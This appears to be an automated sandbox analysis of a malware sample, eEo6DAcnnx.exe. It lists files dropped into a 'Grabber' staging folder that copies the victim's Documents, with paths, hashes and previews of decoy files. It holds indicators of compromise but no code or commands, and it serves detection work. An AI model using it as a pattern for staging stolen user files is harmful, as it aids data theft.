Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\EWZCVGNOWT.xlsx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.690071120548773
Encrypted:	false
SSDEEP:	24:Hpi2eIMaeHmnj0AhtUkcnKCORSCQH8qvLrUo:Hs2e4njIkc6xQH8qvv5
MD5:	8F49644C9029260CF4D4802C90BA5CED
SHA1:	0A49DD925EF88BDEA0737A4151625525E247D315
SHA-256:	C666CACFDB412CE2BC653F9E2F19484DE94216D950F8C304D1F1F8ADD2EE32CE
SHA-512:	CA63EE1758AFE40FB8569FB3FF5A52BED8A593DC163F5F2462CEBFE1EA4F3F7AB4561435912279C4371944F7C63068D7474AB9F38492F34567E10E5188338C7E
Malicious:	false
Preview:	EWZCVGNOWTCRGCAHGHIARWHBREQUWUMDZTEFKOZTBZKDHTGWOMOMXQJLCILTVOXJTWXEZRFVVOJJDUXCZNNWMUHQTYLHFYPOOBFJLGZGDSYZASNMWULDKVPIBSBESQVOBWTJCIQCCRZOQSMEFZAEOCFIPUXIHTROYFKQUTFSAUWBWISJHTVIQQEEIJVJHOBGZOPHDRBICMJCZJYKKJVLBUSHZHJSFDMYEGPBFRDSFIJIUADWYUWFSOFGQCFBFZHQMDWRKPFVNPDGQDAXYWPQENYPVCKPJTHAOXRLVMNFIOJBVFWANBCOTBENTFVQZCFBFDBMQUHCCCHMMQUOWSBCZYACVCNJFQKUCOMHGVNGGVDACUHMUYLJZQAKUNMISIRRZWDKBKSCPQEZJBHYOZZAXJVBHPFZNDXVHGWHNSVWMYZWRVIDTUCEOPZZRDVHTZKWHATLUHBDJSDWLCXQNXOWYUDQGZJKCAXDTIVXTBCQYHDKCAAFPJFSMAIFXPBWZRPFPKSDNBTLCMBJVBNHSANLTYRSVYQCPKAVQBYOUIOKJPCSLSZRHROXWWPPNZAAXTNVEINHTCLXLDMDBKYPOGMKCUIRVICNSACARZMRYFMXNDTHABPDGEHGCEAXGZZZNHYOCNFJZCIJNBBNBGAUMIROJJYSLPZARPCRZNPUZHXYZLDLXFPTCUWDLYNUMOSJWAOBYFOHEOOAGSALYXBYBYNOLNVRWYGBMDREEFNSPFBRMCNZKOZYEFYTGCMVSCLNGPIPBUDCPAMQEHOAUUBIQZZVXLYZWJOMBCITZXNLTEPYYRLUUAPJTGKEVKMNIMNQWNLLBUVLJOYGWJXXREBMWKGHQSRPNVJAECVNLXPVKWNPACZWFRCNSRBCRVPAPFJGUCNKUOOMSEURPZQJTKWTBOYFSFQOBHOUCLHWYMZMDGTXJBELWCWSQGBSNYBSEAJYTJCJQBKRUPJLBACULNATKEWAJTPTTOUKYDWVFZCDBMMO

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\GIGIYTFFYT.png

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.7020597455120665
Encrypted:	false
SSDEEP:	24:Yyd0vLZv9GwBegFWbhTY2P2m1O278kZUU3ZjGaIv:YhLZugsbh0m1bYUpjG9
MD5:	47F4925C44B6916FE1BEE7FBB1ACF777
SHA1:	D7BFAEF09A15A105540FC44D2C307778C0553CE5
SHA-256:	62FB407C253C01957EB5C9ED8075E409FD399C065B6478E5080FDC8573A1AED8
SHA-512:	6B4870B47569942B119533F4C519498D2E7D76FBBD36EC9CAE219BE800864CFA47FC65C98FDDA7D92C0B52F1EA381D7C3D5DC4DE204ABF04CED7F6C43004C1B8
Malicious:	false
Preview:	GIGIYTFFYTJMXILDVGFXDVEFQCHNFYFEULLQEETZRJVMRRJHJRTSPPAOMDMYNAGWNEBMIDVTHKVEEQISBNMPHNFVYDEIXBDPFHYTCLNZABIXDFYKJDBRYRTWDLZOXHMMCFSILUYMHVQPPEGCEUDABQUBALGXBEBBTFQFPGZCSFMMFCTBAMXKOPCAJHDRXWLGLWELWIKNGHWJKDKBDVZPNHUCSZFTPSDHZOUUHUWDVSEAQXIDUUMNXESGKGQYYBWVWCBVILKQLVAXNHJSZYYZUWKUTBRCTNQQXVQCKHLEJIFZFWACZEFAUJYVSEGBIHIZRMKJYWHTJECURPVKKWUKKOFVGYEOSDEDBUWBYBNHTAOSHDXDTPIWBWQANBSHMKUUHFNTKLQLSWCOLNGFZPIBZTKTDJTYYNNHDUOZEFWBJRQDBJTCXGDSCYEYJCUVSMWPBPZCBDOMCVGPOYMXSQANNOXIQBZMOMUCJZXAGIICUFLFDZJOBTEGSAQHEIBBWATDCJXSEIADCNGGARMLYLRJZSIBRRPFAORVDSNHOQWANXTRGLRQZZTEROQRQYBPGYXMSIGOYQMJDIJSQBFLNMQOGKOFUQVIWNLZBQMUSTEPCUCGVOFNLQMYFHDEDLGEYXHBHQNMKSASMZZEYCWBNZKYTKNRWJBUJJTXRIHTHPKRBWIFFKIBKCVEEYOHLCOOBFBXELQKMEOTDDLPFFLMCBOAJRNITAVONLYXBCYITNNXEUAVAVDHVGOGFHPXZDZUUQPRYTGQIFNRRHVDFAGSLTNZENPMFBPWMOHFFCIEPUUGBVHDOBSRPRHEPPLYLJUVAKAYIJRZKMAKRPYDSBIZTPWQFSZBWKYUIQXRDRUUPAWFEQRHVNMAPCFIPTHYPQPAZQNEACARWXUWSRKGERYPPRVAAPAVQYFCPYCRXLJQAMPXGLECYIZDRHPEMJPTXFOJABHMNZZHXHBCYXJEKEEQGKOAGJVHRWOSVEPEFFHDAVPR

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\JDDHMPCDUJ.jpg

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.687055908915499
Encrypted:	false
SSDEEP:	24:X3rfasg2Tpd/zBJY+q9FZP0DJR6BdqWD5gB8H36D6jXLiUk2ZTV:X+52L/dJYBjYJRoddD5C8HqD8ZDZTV
MD5:	94EDB575C55407C555A3F710DF2A8CB3
SHA1:	3AB8DF4B92C320D7D4C661EAB608E24B43F3DD13
SHA-256:	DD3A4A93D60E4B7840557A44DAAF77F6B6F85032C7DD5FB10BE54C07B0E1E261
SHA-512:	F8F78D10AE19735413AF11F0C8DAC41644479D345DC6B300412DEDA9779A01DDFC7150FBFD54F2582A0DF8524B7E507886DBC49E59B084320017E9E64FC8DBFA
Malicious:	false
Preview:	JDDHMPCDUJFORBKGTIFQHFPQNEKFAIHGBDYZBWNZMVTSZXTGRUOCZPQRXMGXBNMAHGODCTVNAHQHZMJYIYXLTVDMEAVEXSWFQCDVPRSSLREITYMWHUXVVKLPJXQJOHYPAVYXSIMBBOTIWYDKNCDVKZZMEIFEDNNXHAHMYLPOUGNKMPZVDEQRUPZBQCKZDQINFECCUZINROAFGLIAMVWHXPPXOWZMWTITWBJFIENEHRXRHRPVUAIUAJUYDBBSQQMTJJXOAAMHVKJEOIQRSNKKQSGCHAUKUYPJEBZIGZTVKUXZEQOUSZPQBHKFHECDNFGTGIDHSJFVLAKZPDYVJVWECRIKKUCCFNNHBLBFCJEKSUZTITTTLQVOHKFHXFIIYDOZNAIBCDIRXJAYKHCOEXBOGSGEGGQEMHFXIZREOFZJSAFXTGSSZLVKYOANMZNPNESDZMFYWTZHIKUSMZXACWZEIMGTFRSZCGICPOSTZRECQYWZECQVLAWXESWPCDXLHIMJHSZJSDAXNXHETAWLZDXTZAPKBHSMKMYYGVSJCUIJSIFUHHMPIRBASPUOUXKKPQCECQBBZUSIXEOXLFFSQIFCTAIRASCMWEHFOXGEJRXFGJODUTKITHEAKFFJQTQNWWKXXDELWDHHEDWUTMSLXQJPVGOBKELYSRBQFYKXFHWGSCVLTCFKOEJMLUXIZVDPFHXHTSMTDRTVCNLISGJFVQRUTMZDYPUYBAEASZCSEUVHWRIQDEJIZQQHJNTIIICFMMPVLXOIVTPCTDKFPDVWXSBXZDXFUMBJTJMKOOHIMIOAKEJSIDIOJSRMRYXLDVGDBBYXARBNHXOXMBXYOTEFOAXRAUKXTWKYYGWNAHHCIIKQHYAETGBWABTEMJKNTEUQAWGHRIKDGGNHUIVVPPYPYTZERZKDPLUSIKPBDPJOCBYQJDEKAVQKHFTPBZJQOUCVBHAHZZGEXOCYGYDCZICBOETRSJSMVEZKINDRIKZYTUIS

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\KLIZUSIQEN.pdf

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696703751818505
Encrypted:	false
SSDEEP:	24:b16WkAmEUwq/rBFGdG3NQGsu7DYh3NTgfAtxoLxLP/VEmcM:hkAYzzbG4NPsuYh3N0fAjaxLnl
MD5:	19255ED5D4F37A096C105CEF82D0F5C0
SHA1:	96C5E995A91C8BC479E1C2ADB32C7E022EB8FAC7
SHA-256:	A0E9C6A5B14DB7AB22994C5017930720299F4492CE99D95A07BEB46BF2BAE7E8
SHA-512:	CDCD7E54677DE3BCE65BD80C855DE9684517F931ECA4D17E984C1D02E5E5CE9B50582ECCFA43F71A4F0A4E1743D74FCF3D588424AF519BFAE628EA49082C6E68
Malicious:	false
Preview:	KLIZUSIQENZWQAFPHPIZMRSSYSYIINGOAPFQHPCFTPTNYLSNMTRTDZSWEBKDRHIUFOFGWKTHENHAQWTYTMOJNOWPWJAPIZKOPDMUAKVTHXYWDBHBVWDTBCFVXJHDCUGTPASHSDSKUVYPRPPUXKURDNZYJENQKRHCARIUAOIAFRFWGQDXOAPXUJAUWRVEASXCVARWJMIPINSQDPGOWLRMNRCAEZGZIYDWBEWCOJWHLMOUROGZKCFGXDKPHAJADQCYUZYSYXQOIEGZIJWZLUJEKZUASKHQOGVFGVEXIQTENJDEKERNBPZGKNXWYZVXDDAYNSFBZAKWCEEYDSJONDKOYOBSAVICMHPZZRHRLNYDOIDQNYLXFDCCUOIJANPQCOIJDXFLDMIBVHBYSNYGAVWTHYCIPBRPTWSQXWXZZJBFNAUOMALKDRYIMJCRJXXQXCEREPQGNQHHOFEMEOXMSZEWOLTOLCOUCQNPRIPXUSVZNATFZKIJQZKGKTCYOMBXFTSXBXYIHMOONWWGRKPSNEMONASEFSVWNWIBXDSMEKQJIDCFPVMGAAUPBVOYAIKYQEFVSXOFTEMHNXVNMMENORLDYPZUSILNZRPHITCWDQMLEFZOEGPJDXQLBSIYRONLBYOSJVTEMBHNVXCMMRDVOAYSMNNRKRLBSQBIWIWHYUMBKTIYQTROZKTGZZMEFWINSQAXMWWLRRSPXAQZURXOTMUHPNLOUWMXRQSGXIAQILQCZUUTRJZVRNLBSHADNHZSDOQIYIZCEZHFRITTHSZOSBZGNCQVHXSFZJCEVSJCZZYTCFXLNBKMTPXYHPDXMMMXHUAAQWYYFHMKXWZBXZBWKFQHLPMVMGYFZBMVSYGKGTOLLJCBFKHHWFIVPPXPTVEJEBZBXHKNYKDYLIAKLLPJZFPVJAROJUOZZUWNZRRDZNYLGBHMNWUKJLSAXBUBWJZYCMVLYBCQJLBOROBDSZGHMCIASVUCVNDTGDALKYLTOMJK

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Music\desktop.ini

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5258560106596737
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qml3lDmo0qmZclLwr2FlDmo0IWUol94klrgl2FlDmo0qjKAZY:QCGwv4o0x34o02lLwiF4o0ZvbUsF4o0Z
MD5:	06E8F7E6DDD666DBD323F7D9210F91AE
SHA1:	883AE527EE83ED9346CD82C33DFC0EB97298DC14
SHA-256:	8301E344371B0753D547B429C5FE513908B1C9813144F08549563AC7F4D7DA68
SHA-512:	F7646F8DCD37019623D5540AD8E41CB285BCC04666391258DBF4C42873C4DE46977A4939B091404D8D86F367CC31E36338757A776A632C7B5BF1C6F28E59AD98
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.0.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.9.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.0.8.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.7.....

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Camera Roll\desktop.ini

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
MD5:	D48FCE44E0F298E5DB52FD5894502727
SHA1:	FCE1E65756138A3CA4EAAF8F7642867205B44897
SHA-256:	231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
SHA-512:	A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\Saved Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	190
Entropy (8bit):	3.5497401529130053
Encrypted:	false
SSDEEP:	3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
MD5:	87A524A2F34307C674DBA10708585A5E
SHA1:	E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
SHA-256:	D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
SHA-512:	7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Pictures\desktop.ini

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.514398793376306
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
MD5:	29EAE335B77F438E05594D86A6CA22FF
SHA1:	D62CCC830C249DE6B6532381B4C16A5F17F95D89
SHA-256:	88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
SHA-512:	5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\My Videos\desktop.ini

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	504
Entropy (8bit):	3.5218877566914193
Encrypted:	false
SSDEEP:	12:QZsiL5wmHOlDmo0qmclDmo0qmJclLwr2FlDmo0IWVvklrgl2FlDmo0qjKArn:QCGwv4o0o4o0mlLwiF4o090UsF4o01Ar
MD5:	50A956778107A4272AAE83C86ECE77CB
SHA1:	10BCE7EA45077C0BAAB055E0602EEF787DBA735E
SHA-256:	B287B639F6EDD612F414CAF000C12BA0555ADB3A2643230CBDD5AF4053284978
SHA-512:	D1DF6BDC871CACBC776AC8152A76E331D2F1D905A50D9D358C7BF9ED7C5CBB510C9D52D6958B071E5BCBA7C5117FC8F9729FE51724E82CC45F6B7B5AFE5ED51A
Malicious:	false
Preview:	......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.1.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.9.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.9.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.8.....

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\NYMMPCEIMA.png

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6957997909429325
Encrypted:	false
SSDEEP:	24:kKnyV7BxweFQl79j+hRxUY//oWt/yeHEMcXJn25feaqrZZqW+LRJvy:kKnY7wGQlSxH/9kM0Jn25grZgRJa
MD5:	4F49714E789620AEDB7B9565DC949466
SHA1:	5917AC09E3D5074BFF8E1289865CAFF6403D1E82
SHA-256:	A9D5D3D8BE1D9E0187DA4AF85AFF3E2D1D6DE977D13EDA76900C96D98A8F073B
SHA-512:	61F147FA2B300AC2E3A42445F1283A47C805B756F36730CDCD4DB5A711BE43EFA471C7ECFB865908791852D1AAF365284BD4DE01F0EA0BF9DCD416A853C804E9
Malicious:	false
Preview:	NYMMPCEIMABCZIWJTJBTGSCCAGUWVTYLYWSVBSDZXQVJYUDCVLRURABBOBVCVDMKRKSRCSPXNAWPZJIOBULMRNUUOMOQGMWJLMZDBRBKAATADQPXHJFNCLPVAYDJHNDQMYWKBXYCBZJQANHQXCJPZQWORFXISYXSVTGTQJXNOUHRMKMJWJYCVNYAJFLKQVPGEYIUPPSZIHLNRGNCVNQBEZHDSJLAAKTOQOPFKISQUVSYIJUTXMPMVSFBVQNNFUXQRBBZWPVQFKOIAVQQMWQKLBSRPGKOQWZJAMBIDYJLYFILNAEEJCLRGBXDTSTBTNJDUXNFJBEZUDHSQUEENVIJUBNKGOLASBWAZBYYZZCOGWIJLRICWMFOAHSZVHCPRGDQXQUHZNZAIBOSXNAEYXAGWDBIHQGHOMKGZVYJDFBRWFKGJWGGPPTKNYWOHJZEIWRXWBERKQREQFMJHAKYHJCBTJJONCVMKTRJZVEWZOAKRUZLPQOXEQLKYATRQESEWRXETALDGKSHWFGQVXVYWPZEUDKTVGFGTXHQNKYUTVLNVAJFDYFPLRACHLYNSSVZZIAKKEEENZFLNPGNCVKMHGOYMQEBOXNMEXNXHUPMZAMZZQVDPFGLUSJHKGQWGKDPXMSIYPGNIXUXSJQFAXJLLSOUEANCWYAHDTOQTEKVGNOWSZINVNYZYIYNTVHHTDVGBTBPYPINRBPJYKHMRFCGSMCNFESVFMQIFPOJDAJGZEYTMLYQIIYRBVNEZSIWWOKGVIVGLXAQUNYDTWHGEWOLDMZRPSOAJKFXVJJTTIAJVLZGIFIWTHVZZGQOVGNSYXTJVFSXNDQLHICPBSAZIKIPLGSRTCKFEGRKNLTONCJFACYIGQPYUHVPNPUUGOOGHBAMCKOGYKVNNBSVPYVHZVJCMTDSHLBWEDMSWSFZAIRFDEYBDVHTWHABAXCAQCTXQRIUHVQFAEPMNYIWIBWVEEZTZGQTPDYRFAGKUGAEBSQFYYQG

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP.docx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
Preview:	ZGGKNSUKOPMPPNHVZHJQGVEFQIYKECDTBUUNZDYNGQNIRYRWHUTXXPSHQTZPTZVHQXNNQJMVUKUOXVGORIAYJGXFFBGSTKCIJZKEQXQQIVFFMJLOMJSXIEOLRGDCSILZBJCYZNNVATINEQDJPDYKYEGAQWQMEKFVPOYVPNSSIUTCUVWRTSGVMOYKONZJJHVYYHDVZQPBVLAEYYFULQVIAJCQYCDCEGDPRRLXXZXFIPXZYSZYOHEAPCISCQQIAXVPAQUVHGATHPNBNNZVCLFBZBDBZXOQODZLPUONDHVUIQLSZFYHOZHZHEGULYTEVGGLQVDEJVLJEVPQFWMTICLCXTQWMOFFAXIMODRSEVRDYZWTZFYKVZAJEAQBNILURHKTJBNMYKYFSYGEEBYTRKZAHNYHNKUVIQXUDTDSCKKVFAHEOCHUYENGZNJLYIKKSHPNCIQVEDXXJBQWLPTRWDPYUIEDKEYQXNAFVHZZHVLORWXSFDRTMIHTRSJAHAAHMDOMCQGDKDFHBNGVZQTTCSWSPIHCTQXSLLYZTFMEMACZONDWHGUSVOCWSBRSQZPAKSJHSWPMXYNSVNZCBVQSSDMAXHBCCABCBJMXUBBMSGLUNDNJSGZUMDVFIJNOELGIFULZKPJDVNZQPDOWCXYQGTVJKDHOFHYVKNSZDNMILUISTCTZRFSEWRMDZLOBGFMXNVDCJYYLJUDJGSTSUEEGOSENKRNGXAGHHNOGGDSDRGIFROBPWJOCJPXDATRXEPUOWMBLLOQTSWYHGAJBORDMNUEAHWTKUYXIIPMYCMRMTPBVKTCXSHVYJOWCUSTTUMTZOYSOSDSUBSGMLOTYCZCTXANUCXZOADEOEJYBCLEULBLYXGMGORWYBNIGNRUWJATDKWTNSTJBVFQENEPZJCVWRRMXFFHEBPBGQZTDBCCMCQDYUYICLUZKGYRMAVIURGHOINFOGSJSSMACWITEPVYEMKEJTPCQQMYWOBTBOCHUSNOE

C:\Users\user\AppData\Local\45932bff64d05104b91545939f748c0e\user@715575_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZGGKNSUKOP.xlsx

Download File

Process:	C:\Users\user\Desktop\eEo6DAcnnx.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.6959554225029665
Encrypted:	false
SSDEEP:	24:TifvYKkubZMu3HGRW2lJUao1nH5o4WGAZ46:rKkmZMuklJUj+GAZ46
MD5:	DCABA2748DFEAEF0BFBC56FD9F79315C
SHA1:	B87FBA690A774893B22B9F611DFDCB5CDC520269
SHA-256:	86DF5957E0CD2EBDFC2FF8C2F05569BA71462149042DF57ECE5E8228E3BC5DDD
SHA-512:	65F10692D0AE5CBAADDB03E89D6CD1D3486429906437A17C2B1157BEDB069202B1DC52A4E864AA8F90B8CBD171FD2A3E150185BF7DFF81540E209B6A8F8829F3
Malicious:	false
